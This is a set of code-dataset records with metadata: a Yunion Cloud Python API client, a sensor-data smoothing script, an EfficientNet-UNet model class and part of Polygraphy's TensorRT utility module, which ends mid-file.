dnsrecords\n\nfrom yunionclient.api import baremetalagents\nfrom yunionclient.api import baremetals\nfrom yunionclient.api import baremetalnetworks\nfrom yunionclient.api import baremetalstorages\n\nfrom 
yunionclient.api import reservedips\n\nfrom yunionclient.api import scheduler\n\nfrom yunionclient.api.stats import RegionStatsManager\n\nfrom yunionclient.api.tenantinfo import TenantInfo, TenantInfoManager\n\nfrom yunionclient.api import users\nfrom yunionclient.api import tenants\nfrom yunionclient.api import projects\nfrom yunionclient.api import groups\nfrom yunionclient.api import roles\nfrom yunionclient.api import groupusers\n\nfrom yunionclient.api import ec2credentials\nfrom yunionclient.api import services\nfrom yunionclient.api import endpoints\nfrom yunionclient.api import schedtags\nfrom yunionclient.api import metadatas\nfrom yunionclient.api import loadbalancers\n\nlogger = logging.getLogger(__name__)\n\n\nclass Client(http.HTTPClient):\n \"\"\"Client for Yunion Cloud API\n \"\"\"\n\n def __init__(self, auth_url, username, password, domain_name,\n region=None, zone=None, endpoint_type='internalURL',\n timeout=600, insecure=False):\n \"\"\" Initialize a new client for the Images v1 API. \"\"\"\n super(Client, self).__init__(timeout, insecure)\n\n self.auth_url = auth_url\n self.username = username\n self.password = password\n self.domain_name = domain_name\n\n self.endpoint_type = endpoint_type\n\n self.set_region(region, zone)\n\n self.default_tenant = None\n self.tenants_info_manager = TenantInfoManager()\n\n self.keypairs = keypairs.KeypairManager(self)\n self.zones = zones.ZoneManager(self)\n self.hosts = hosts.HostManager(self)\n self.wires = wires.WireManager(self)\n self.storages = storages.StorageManager(self)\n\n self.hostwires = hostwires.HostwireManager(self)\n self.hoststorages = hoststorages.HoststorageManager(self)\n\n self.networks = networks.NetworkManager(self)\n self.disks = disks.DiskManager(self)\n\n self.flavors = flavors.FlavorManager(self)\n\n self.guests = guests.GuestManager(self)\n\n self.guestnetworks = guestnetworks.GuestnetworkManager(self)\n self.groupnetworks = groupnetworks.GroupnetworkManager(self)\n self.guestdisks = guestdisks.GuestdiskManager(self)\n\n self.groupguests = groupguests.GroupguestManager(self)\n\n self.usages = usages.UsageManager(self)\n\n self.images = images.ImageManager(self)\n\n self.vncproxy = vncproxy.VNCProxyManager(self)\n\n self.sshrelay = sshrelay.SSHRelayManager(self)\n\n self.logs = logs.LogManager(self)\n\n self.quotas = quotas.QuotaManager(self)\n\n self.scheduler = scheduler.SchedulerManager(self)\n\n self.users = users.UserManager(self)\n self.tenants = tenants.TenantManager(self)\n self.projects = projects.ProjectManager(self)\n self.groups = groups.GroupManager(self)\n self.roles = roles.RoleManager(self)\n self.groupusers = groupusers.GroupuserManager(self)\n\n self.ec2credentials = ec2credentials.EC2CredentialManager(self)\n self.services = services.ServiceManager(self)\n self.endpoints = endpoints.EndpointManager(self)\n\n self.secgroups = secgroups.SecuritygroupManager(self)\n\n self.dns = dnsrecords.DNSRecordManager(self)\n\n self.baremetalagents = baremetalagents.BaremetalAgentManager(self)\n self.baremetals = baremetals.BaremetalManager(self)\n self.baremetalnetworks = baremetalnetworks.BaremetalnetworkManager(self)\n self.baremetalstorages = baremetalstorages.BaremetalstorageManager(self)\n\n self.reservedips = reservedips.ReservedIPManager(self)\n\n self.schedtags = schedtags.SchedtagManager(self)\n self.schedtag_hosts = schedtags.SchedtagHostManager(self)\n\n self.region_stats = RegionStatsManager(self)\n self.metadatas = metadatas.MetadataManager(self)\n self.loadbalancers = 
loadbalancers.LoadbalancerManager(self)\n self.loadbalancerlisteners = loadbalancers.LoadbalancerListenerManager(self)\n self.loadbalancerlistenerrules = loadbalancers.LoadbalancerListenerRuleManager(self)\n self.loadbalancercertificates = loadbalancers.LoadbalancerCertificateManager(self)\n self.loadbalancerbackendgroups = loadbalancers.LoadbalancerBackendGroupManager(self)\n self.loadbalancerbackends = loadbalancers.LoadbalancerBackendManager(self)\n self.loadbalanceracls = loadbalancers.LoadbalancerAclManager(self)\n\n self.loadbalancerclusters = loadbalancers.LoadbalancerClusterManager(self)\n self.loadbalanceragents = loadbalancers.LoadbalancerAgentManager(self)\n\n def set_region(self, region, zone=None):\n self.region = region\n self.zone = zone\n\n def _authenticatev3(self, project_name=None, project_id=None):\n logging.info('authenticate %s %s' % (project_name, project_id))\n auth = {}\n user = {'name': self.username, 'password': self.password}\n if self.domain_name:\n user['domain'] = {'name': self.domain_name}\n else:\n user['domain'] = {'id': 'default'}\n auth['identity'] = {'methods': ['password'],\n 'password': {'user': user}}\n project = {}\n if project_name:\n project['name'] = project_name\n project['domain'] = {'id': 'default'}\n if project_id:\n project['id'] = project_id\n auth['scope'] = {'project': project}\n body = {'auth': auth}\n resp, body = self._json_request(self.auth_url, None,\n 'POST', '/auth/tokens', body=body)\n if 'token' in body:\n token_id = resp['x-subject-token']\n if 'project' in body['token']:\n self.default_tenant = TenantInfo(None, None)\n token = {'id': token_id,\n 'tenant': body['token']['project'],\n 'expires': body['token']['expires_at']}\n catalog = body['token']['catalog']\n user = body['token']['user']\n self.default_tenant.set_access_info(token, catalog, user)\n self.tenants_info_manager.add_tenant(self.default_tenant)\n else:\n self._fetch_tenants(token_id)\n return True\n else:\n raise Exception('Wrong return format %s' % json.dumps(body))\n\n def _authenticate(self, tenant_name=None, tenant_id=None):\n logging.info('authenticate %s %s' % (tenant_name, tenant_id))\n auth = {}\n auth['passwordCredentials'] = {'username': self.username,\n 'password': self.password}\n if tenant_id is not None and len(tenant_id) > 0:\n auth['tenantId'] = tenant_id\n elif tenant_name is not None and len(tenant_name) > 0:\n auth['tenantName'] = tenant_name\n body = {'auth': auth}\n resp, body = self._json_request(self.auth_url, None,\n 'POST', '/tokens', body=body)\n # print json.dumps(body, indent=4)\n if 'access' in body:\n token = body['access']['token']\n catalog = body['access']['serviceCatalog']\n user = body['access']['user']\n if 'tenant' in token:\n self.default_tenant = TenantInfo(None, None)\n # print 'Token:', token\n self.default_tenant.set_access_info(token, catalog, user)\n self.tenants_info_manager.add_tenant(self.default_tenant)\n else:\n self._fetch_tenants(token['id'])\n return True\n else:\n raise Exception('Wrong return format %s' % json.dumps(body))\n return False\n\n def _fetch_tenants(self, token):\n try:\n resp, body = self._json_request(self.auth_url, token,\n 'GET', '/tenants')\n if 'tenants' in body:\n for t in body['tenants']:\n self.tenants_info_manager.add_tenant(TenantInfo(t['id'],\n t['name']))\n return True\n except Exception as e:\n raise Exception('_fetch_tenants %s' % e)\n return False\n\n def get_tenants(self):\n self._authenticate(None, None)\n return self.tenants_info_manager.get_tenants()\n\n def set_project(self, 
project_name=None, project_id=None):\n return self.set_tenant(tenant_name=project_name, tenant_id=project_id)\n\n def set_tenant(self, tenant_name=None, tenant_id=None):\n tenant = self.tenants_info_manager.get_tenant(tenant_id=tenant_id,\n tenant_name=tenant_name)\n if tenant is None:\n return self._authenticatev3(project_name=tenant_name,\n project_id=tenant_id)\n else:\n self.default_tenant = tenant\n return True\n\n def get_default_tenant(self):\n if self.default_tenant is None:\n raise Exception('No tenant specified')\n # if self.default_tenant.expire_soon():\n # self._authenticate(tenant_name=self.default_tenant.get_name(),\n # tenant_id=self.default_tenant.get_id())\n return self.default_tenant\n\n def get_regions(self):\n t = self.get_default_tenant()\n if t is not None:\n return t.get_regions()\n else:\n return None\n\n def get_endpoint(self, service, admin_api=False, region=None, zone=None):\n t = self.get_default_tenant()\n if t is not None:\n if admin_api:\n ep_type = 'adminURL'\n else:\n ep_type = self.endpoint_type\n if region is None:\n region = self.region\n if zone is None:\n zone = self.zone\n return t.get_endpoint(region, service, ep_type, zone=zone)\n else:\n raise Exception('No tenant specified')\n\n def _wrapped_request(self, func, service, admin_api, method, url, **kwargs):\n t = self.get_default_tenant()\n if t is not None:\n ep = self.get_endpoint(service, admin_api)\n if ep is not None:\n ep = self._strip_version(ep)\n return func(ep, t.get_token(), method, url, **kwargs)\n else:\n raise Exception('NO valid endpoint found for %s' % service)\n else:\n raise Exception('No tenant specified')\n\n def json_request(self, service, admin_api, method, url, **kwargs):\n return self._wrapped_request(self._json_request, service, admin_api,\n method, url, **kwargs)\n\n def raw_request(self, service, admin_api, method, url, **kwargs):\n return self._wrapped_request(self._raw_request, service, admin_api,\n method, url, **kwargs)\n\n def get_urllib2_raw_request(self, service, admin_api, url, **kwargs):\n return self._wrapped_request(self._get_urllib2_raw_request, service,\n admin_api, 'GET', url, **kwargs)\n\n def from_file(self, filename):\n with open(filename, 'r') as f:\n desc = f.read()\n self.from_json(json.loads(desc))\n\n def from_json(self, desc):\n self.auth_url = desc['auth_url']\n self.username = desc['username']\n self.endpoint_type = desc['endpoint_type']\n self.set_region(desc['region'], desc.get('zone', None))\n self.tenants_info_manager = TenantInfoManager()\n self.tenants_info_manager.from_json(desc['tenants'])\n if 'default_tenant_id' in desc:\n self.set_tenant(tenant_id=desc['default_tenant_id'])\n\n def to_file(self, filename):\n with open(filename, 'w') as f:\n desc = self.to_json()\n f.write(json.dumps(desc))\n\n def to_json(self):\n desc = {}\n desc['tenants'] = self.tenants_info_manager.to_json()\n desc['username'] = self.username\n desc['auth_url'] = self.auth_url\n desc['region'] = self.region\n if self.zone:\n desc['zone'] = self.zone\n desc['endpoint_type'] = self.endpoint_type\n if self.default_tenant is not None:\n desc['default_tenant_id'] = self.default_tenant.get_id()\n return desc\n\n def is_admin(self):\n tenant = self.get_default_tenant()\n if tenant is not None:\n return tenant.is_admin()\n return False\n\n def is_system_admin(self):\n tenant = self.get_default_tenant()\n if tenant is not None:\n return tenant.is_system_admin()\n return False\n\n", "repo_name": "swordqiu/python_yunionsdk", "sub_path": "yunionclient/api/client.py", "file_name": 
"client.py", "file_ext": "py", "file_size_in_byte": 13847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 68, "usage_type": "call"}, {"api_name": "yunionclient.common.http.HTTPClient", "line_number": 71, "usage_type": "attribute"}, {"api_name": "yunionclient.common.http", "line_number": 71, "usage_type": "name"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfoManager", "line_number": 91, "usage_type": "call"}, {"api_name": "yunionclient.api.keypairs.KeypairManager", "line_number": 93, "usage_type": "call"}, {"api_name": "yunionclient.api.keypairs", "line_number": 93, "usage_type": "name"}, {"api_name": "yunionclient.api.zones.ZoneManager", "line_number": 94, "usage_type": "call"}, {"api_name": "yunionclient.api.zones", "line_number": 94, "usage_type": "name"}, {"api_name": "yunionclient.api.hosts.HostManager", "line_number": 95, "usage_type": "call"}, {"api_name": "yunionclient.api.hosts", "line_number": 95, "usage_type": "name"}, {"api_name": "yunionclient.api.wires.WireManager", "line_number": 96, "usage_type": "call"}, {"api_name": "yunionclient.api.wires", "line_number": 96, "usage_type": "name"}, {"api_name": "yunionclient.api.storages.StorageManager", "line_number": 97, "usage_type": "call"}, {"api_name": "yunionclient.api.storages", "line_number": 97, "usage_type": "name"}, {"api_name": "yunionclient.api.hostwires.HostwireManager", "line_number": 99, "usage_type": "call"}, {"api_name": "yunionclient.api.hostwires", "line_number": 99, "usage_type": "name"}, {"api_name": "yunionclient.api.hoststorages.HoststorageManager", "line_number": 100, "usage_type": "call"}, {"api_name": "yunionclient.api.hoststorages", "line_number": 100, "usage_type": "name"}, {"api_name": "yunionclient.api.networks.NetworkManager", "line_number": 102, "usage_type": "call"}, {"api_name": "yunionclient.api.networks", "line_number": 102, "usage_type": "name"}, {"api_name": "yunionclient.api.disks.DiskManager", "line_number": 103, "usage_type": "call"}, {"api_name": "yunionclient.api.disks", "line_number": 103, "usage_type": "name"}, {"api_name": "yunionclient.api.flavors.FlavorManager", "line_number": 105, "usage_type": "call"}, {"api_name": "yunionclient.api.flavors", "line_number": 105, "usage_type": "name"}, {"api_name": "yunionclient.api.guests.GuestManager", "line_number": 107, "usage_type": "call"}, {"api_name": "yunionclient.api.guests", "line_number": 107, "usage_type": "name"}, {"api_name": "yunionclient.api.guestnetworks.GuestnetworkManager", "line_number": 109, "usage_type": "call"}, {"api_name": "yunionclient.api.guestnetworks", "line_number": 109, "usage_type": "name"}, {"api_name": "yunionclient.api.groupnetworks.GroupnetworkManager", "line_number": 110, "usage_type": "call"}, {"api_name": "yunionclient.api.groupnetworks", "line_number": 110, "usage_type": "name"}, {"api_name": "yunionclient.api.guestdisks.GuestdiskManager", "line_number": 111, "usage_type": "call"}, {"api_name": "yunionclient.api.guestdisks", "line_number": 111, "usage_type": "name"}, {"api_name": "yunionclient.api.groupguests.GroupguestManager", "line_number": 113, "usage_type": "call"}, {"api_name": "yunionclient.api.groupguests", "line_number": 113, "usage_type": "name"}, {"api_name": "yunionclient.api.usages.UsageManager", "line_number": 115, "usage_type": "call"}, {"api_name": "yunionclient.api.usages", "line_number": 115, "usage_type": "name"}, {"api_name": "yunionclient.api.images.ImageManager", "line_number": 
117, "usage_type": "call"}, {"api_name": "yunionclient.api.images", "line_number": 117, "usage_type": "name"}, {"api_name": "yunionclient.api.vncproxy.VNCProxyManager", "line_number": 119, "usage_type": "call"}, {"api_name": "yunionclient.api.vncproxy", "line_number": 119, "usage_type": "name"}, {"api_name": "yunionclient.api.sshrelay.SSHRelayManager", "line_number": 121, "usage_type": "call"}, {"api_name": "yunionclient.api.sshrelay", "line_number": 121, "usage_type": "name"}, {"api_name": "yunionclient.api.logs.LogManager", "line_number": 123, "usage_type": "call"}, {"api_name": "yunionclient.api.logs", "line_number": 123, "usage_type": "name"}, {"api_name": "yunionclient.api.quotas.QuotaManager", "line_number": 125, "usage_type": "call"}, {"api_name": "yunionclient.api.quotas", "line_number": 125, "usage_type": "name"}, {"api_name": "yunionclient.api.scheduler.SchedulerManager", "line_number": 127, "usage_type": "call"}, {"api_name": "yunionclient.api.scheduler", "line_number": 127, "usage_type": "name"}, {"api_name": "yunionclient.api.users.UserManager", "line_number": 129, "usage_type": "call"}, {"api_name": "yunionclient.api.users", "line_number": 129, "usage_type": "name"}, {"api_name": "yunionclient.api.tenants.TenantManager", "line_number": 130, "usage_type": "call"}, {"api_name": "yunionclient.api.tenants", "line_number": 130, "usage_type": "name"}, {"api_name": "yunionclient.api.projects.ProjectManager", "line_number": 131, "usage_type": "call"}, {"api_name": "yunionclient.api.projects", "line_number": 131, "usage_type": "name"}, {"api_name": "yunionclient.api.groups.GroupManager", "line_number": 132, "usage_type": "call"}, {"api_name": "yunionclient.api.groups", "line_number": 132, "usage_type": "name"}, {"api_name": "yunionclient.api.roles.RoleManager", "line_number": 133, "usage_type": "call"}, {"api_name": "yunionclient.api.roles", "line_number": 133, "usage_type": "name"}, {"api_name": "yunionclient.api.groupusers.GroupuserManager", "line_number": 134, "usage_type": "call"}, {"api_name": "yunionclient.api.groupusers", "line_number": 134, "usage_type": "name"}, {"api_name": "yunionclient.api.ec2credentials.EC2CredentialManager", "line_number": 136, "usage_type": "call"}, {"api_name": "yunionclient.api.ec2credentials", "line_number": 136, "usage_type": "name"}, {"api_name": "yunionclient.api.services.ServiceManager", "line_number": 137, "usage_type": "call"}, {"api_name": "yunionclient.api.services", "line_number": 137, "usage_type": "name"}, {"api_name": "yunionclient.api.endpoints.EndpointManager", "line_number": 138, "usage_type": "call"}, {"api_name": "yunionclient.api.endpoints", "line_number": 138, "usage_type": "name"}, {"api_name": "yunionclient.api.secgroups.SecuritygroupManager", "line_number": 140, "usage_type": "call"}, {"api_name": "yunionclient.api.secgroups", "line_number": 140, "usage_type": "name"}, {"api_name": "yunionclient.api.dnsrecords.DNSRecordManager", "line_number": 142, "usage_type": "call"}, {"api_name": "yunionclient.api.dnsrecords", "line_number": 142, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalagents.BaremetalAgentManager", "line_number": 144, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalagents", "line_number": 144, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetals.BaremetalManager", "line_number": 145, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetals", "line_number": 145, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalnetworks.BaremetalnetworkManager", 
"line_number": 146, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalnetworks", "line_number": 146, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalstorages.BaremetalstorageManager", "line_number": 147, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalstorages", "line_number": 147, "usage_type": "name"}, {"api_name": "yunionclient.api.reservedips.ReservedIPManager", "line_number": 149, "usage_type": "call"}, {"api_name": "yunionclient.api.reservedips", "line_number": 149, "usage_type": "name"}, {"api_name": "yunionclient.api.schedtags.SchedtagManager", "line_number": 151, "usage_type": "call"}, {"api_name": "yunionclient.api.schedtags", "line_number": 151, "usage_type": "name"}, {"api_name": "yunionclient.api.schedtags.SchedtagHostManager", "line_number": 152, "usage_type": "call"}, {"api_name": "yunionclient.api.schedtags", "line_number": 152, "usage_type": "name"}, {"api_name": "yunionclient.api.stats.RegionStatsManager", "line_number": 154, "usage_type": "call"}, {"api_name": "yunionclient.api.metadatas.MetadataManager", "line_number": 155, "usage_type": "call"}, {"api_name": "yunionclient.api.metadatas", "line_number": 155, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerManager", "line_number": 156, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 156, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerListenerManager", "line_number": 157, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 157, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerListenerRuleManager", "line_number": 158, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 158, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerCertificateManager", "line_number": 159, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 159, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerBackendGroupManager", "line_number": 160, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 160, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerBackendManager", "line_number": 161, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 161, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerAclManager", "line_number": 162, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 162, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerClusterManager", "line_number": 164, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 164, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerAgentManager", "line_number": 165, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 165, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 172, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 194, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 209, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 226, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 234, "usage_type": 
"call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 243, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 324, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfoManager", "line_number": 331, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 339, "usage_type": "call"}]} +{"seq_id": "4852226072", "text": "#!/bin/python\n# cleans sensor data\n# christopher pietsch\nimport sys\nfrom scipy.ndimage import gaussian_filter1d\nimport numpy as np\n \n_i=sys.argv[1]\n_o=sys.argv[2]\n \nf = open(_i, \"r\")\nrl=f.readlines()\n \na=[]\nfor l in rl:\n i = l.split(', ')[1:]\n x=float(i[0])\n y=float(i[1].rstrip('\\n'))\n a.append((x, y))\n \nna=np.array(a)\n \nx, y = na.T\nt = np.linspace(0, 1, len(x))\nt2 = np.linspace(0, 1, 100)\n \nx2 = np.interp(t2, t, x)\ny2 = np.interp(t2, t, y)\nsigma = 10\nx3 = gaussian_filter1d(x2, sigma)\ny3 = gaussian_filter1d(y2, sigma)\n \nx4 = np.interp(t, t2, x3)\ny4 = np.interp(t, t2, y3)\n \nfo=open(_o, 'a')\nfor p in range(len(x3)):\n fo.write(str(x3[p])+\", \"+str(y3[p])+\"\\n\")\n \nfo.close()", "repo_name": "cpietsch/deepsweep", "sub_path": "preprocess/clean.py", "file_name": "clean.py", "file_ext": "py", "file_size_in_byte": 694, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.ndimage.gaussian_filter1d", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.ndimage.gaussian_filter1d", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "20615300481", "text": "# Copyright (c) 2023, NVIDIA CORPORATION. 
All rights reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"EfficientNet Unet model class that takes care of constructing and validating a model.\"\"\"\r\n\r\nimport logging\r\nimport keras\r\nfrom keras.models import Model\r\n\r\nfrom nvidia_tao_tf1.core.templates.efficientnet import EfficientNetB0\r\nfrom nvidia_tao_tf1.cv.unet.model.layers import Conv2DTranspose_block\r\nfrom nvidia_tao_tf1.cv.unet.model.unet_model import UnetModel\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\neff_dict = {'efficientnet_b0': ('block1a_project_bn', 'block2a_project_bn',\r\n 'block3a_project_bn', 'block5a_project_bn')}\r\n\r\n\r\nclass EfficientUnet(UnetModel):\r\n \"\"\"Efficientnet Unet class.\"\"\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n \"\"\"Init function.\r\n\r\n Args:\r\n num_layers (int): Number of layers for scalable feature extractors.\r\n use_pooling (bool): Whether to add pooling layers to the feature extractor.\r\n use_batch_norm (bool): Whether to add batch norm layers.\r\n dropout_rate (float): Fraction of the input units to drop. 0.0 means dropout is\r\n not used.\r\n target_class_names (list): A list of target class names.\r\n freeze_pretrained_layers (bool): Prevent updates to pretrained layers' parameters.\r\n allow_loaded_model_modification (bool): Allow loaded model modification.\r\n template (str): Model template to use for feature extractor.\r\n freeze_bn (bool): The boolean to freeze BN or not.\r\n load_graph (bool): The boolean to laod graph for phase 1.\r\n \"\"\"\r\n super(EfficientUnet, self).__init__(*args, **kwargs)\r\n\r\n def construct_decoder_model(self, encoder_model, export=False):\r\n \"\"\"Construct the decoder for Unet with EfficientNet as backbone.\r\n\r\n Args:\r\n encoder_model (keras.model): keras model type.\r\n export (bool): Set the inference flag to build the\r\n inference model with softmax.\r\n Returns:\r\n model (keras.model): The entire Unet model with encoder and decoder.\r\n \"\"\"\r\n B1, B2, B3, B4 = eff_dict[self.template]\r\n S2 = encoder_model.get_layer(B1).output\r\n S3 = encoder_model.get_layer(B2).output\r\n S4 = encoder_model.get_layer(B3).output\r\n S5 = encoder_model.get_layer(B4).output\r\n skips = [S2, S3, S4, S5]\r\n out = encoder_model.output\r\n for filter_tmp in [512, 256, 128, 64, 32]:\r\n if skips:\r\n skip_to_use = skips.pop()\r\n else:\r\n skip_to_use = None\r\n out = Conv2DTranspose_block(input_tensor=out, filters=filter_tmp,\r\n initializer=\"glorot_uniform\",\r\n skip=skip_to_use,\r\n use_batchnorm=self.use_batch_norm,\r\n freeze_bn=self.freeze_bn)\r\n\r\n out = keras.layers.Conv2D(self.num_target_classes, (1, 1), padding='same',\r\n data_format=\"channels_first\")(out)\r\n if export:\r\n logger.debug(\"Building model for export\")\r\n out = self.get_activation_for_export(out)\r\n\r\n model_unet = Model(inputs=encoder_model.input, outputs=out)\r\n return model_unet\r\n\r\n def get_base_model(self, args, kwargs):\r\n \"\"\"Function to construct model specific 
backbone.\"\"\"\r\n\r\n model_class = EfficientNetB0\r\n kwargs['add_head'] = False\r\n kwargs['input_tensor'] = args[1]\r\n kwargs['stride16'] = True\r\n while args:\r\n args.pop()\r\n\r\n model = model_class(*args, **kwargs)\r\n\r\n return model\r\n", "repo_name": "NVIDIA/tao_tensorflow1_backend", "sub_path": "nvidia_tao_tf1/cv/unet/model/efficientnet_unet.py", "file_name": "efficientnet_unet.py", "file_ext": "py", "file_size_in_byte": 4343, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 25, "usage_type": "call"}, {"api_name": "nvidia_tao_tf1.cv.unet.model.unet_model.UnetModel", "line_number": 32, "usage_type": "name"}, {"api_name": "nvidia_tao_tf1.cv.unet.model.layers.Conv2DTranspose_block", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 81, "usage_type": "attribute"}, {"api_name": "keras.models.Model", "line_number": 87, "usage_type": "call"}, {"api_name": "nvidia_tao_tf1.core.templates.efficientnet.EfficientNetB0", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "70315572647", "text": "import contextlib\nimport json\nimport os\nimport signal\n\nfrom polygraphy import config, mod, util\nfrom polygraphy.common import TensorMetadata\nfrom polygraphy.exception import PolygraphyException\nfrom polygraphy.logger import G_LOGGER, LogMode\n\ntrt = mod.lazy_import(\"tensorrt\")\nnp = mod.lazy_import(\"numpy\")\n\n\nTRT_LOGGER = None\n\n\n@mod.export()\ndef get_trt_logger():\n \"\"\"\n Get the global TensorRT logger created by Polygraphy.\n\n Returns:\n trt.Logger: The TensorRT logger.\n \"\"\"\n global TRT_LOGGER\n\n LoggerType = trt.Logger\n if mod.version(trt.__version__) >= mod.version(\"8.0\"):\n\n class CustomTrtLogger(trt.ILogger):\n def __init__(self):\n trt.ILogger.__init__(self)\n\n def log(self, severity, msg):\n try:\n log_func = {\n # This function cannot throw, so `critical` should not be used here!\n trt.Logger.INTERNAL_ERROR: G_LOGGER.error,\n trt.Logger.ERROR: G_LOGGER.error,\n # Reduce warning spam from TRT.\n trt.Logger.WARNING: lambda msg: G_LOGGER.warning(msg, mode=LogMode.ONCE),\n trt.Logger.INFO: G_LOGGER.verbose,\n trt.Logger.VERBOSE: G_LOGGER.extra_verbose,\n }.get(severity, G_LOGGER.super_verbose)\n\n log_func(msg)\n except KeyboardInterrupt:\n # `log()` is `noexcept` so we need to convert exceptions to signals so that\n # ctrl-C will work as expected.\n os.kill(os.getpid(), signal.SIGTERM)\n\n LoggerType = CustomTrtLogger\n\n if TRT_LOGGER is None:\n TRT_LOGGER = LoggerType()\n return TRT_LOGGER\n\n\ndef _should_use_v3_api():\n return mod.version(trt.__version__) > mod.version(\"8.5.0.9\")\n\n\ndef fail_unavailable(what):\n G_LOGGER.backtrace()\n G_LOGGER.critical(f\"{what} is not available on TensorRT version {trt.__version__}.\")\n\n\ndef check_onnx_parser_errors(parser, success):\n if parser.num_errors > 0:\n for index in range(parser.num_errors):\n G_LOGGER.error(parser.get_error(index))\n G_LOGGER.critical(\"Could not parse ONNX correctly\")\n\n if not success:\n G_LOGGER.critical(\"Failed to parse ONNX model. 
Does the model file exist and contain a valid ONNX model?\")\n\n\ndef get_layer_class_mapping():\n layer_class_mapping = {}\n\n def try_add(layer_type, layer_cls):\n try:\n layer_type = getattr(trt.LayerType, layer_type)\n layer_cls = getattr(trt, layer_cls)\n except AttributeError:\n if config.INTERNAL_CORRECTNESS_CHECKS:\n G_LOGGER.warning(f\"Could not find layer type: {layer_type} or layer class: {layer_cls}\")\n else:\n layer_class_mapping[layer_type] = layer_cls\n\n try_add(\"CONVOLUTION\", \"IConvolutionLayer\")\n try_add(\"FULLY_CONNECTED\", \"IFullyConnectedLayer\")\n try_add(\"ACTIVATION\", \"IActivationLayer\")\n try_add(\"POOLING\", \"IPoolingLayer\")\n try_add(\"LRN\", \"ILRNLayer\")\n try_add(\"SCALE\", \"IScaleLayer\")\n try_add(\"SOFTMAX\", \"ISoftMaxLayer\")\n try_add(\"DECONVOLUTION\", \"IDeconvolutionLayer\")\n try_add(\"CONCATENATION\", \"IConcatenationLayer\")\n try_add(\"ELEMENTWISE\", \"IElementWiseLayer\")\n try_add(\"PLUGIN\", \"IPluginLayer\")\n try_add(\"UNARY\", \"IUnaryLayer\")\n try_add(\"PADDING\", \"IPaddingLayer\")\n try_add(\"SHUFFLE\", \"IShuffleLayer\")\n try_add(\"REDUCE\", \"IReduceLayer\")\n try_add(\"TOPK\", \"ITopKLayer\")\n try_add(\"GATHER\", \"IGatherLayer\")\n try_add(\"MATRIX_MULTIPLY\", \"IMatrixMultiplyLayer\")\n try_add(\"RAGGED_SOFTMAX\", \"IRaggedSoftMaxLayer\")\n try_add(\"CONSTANT\", 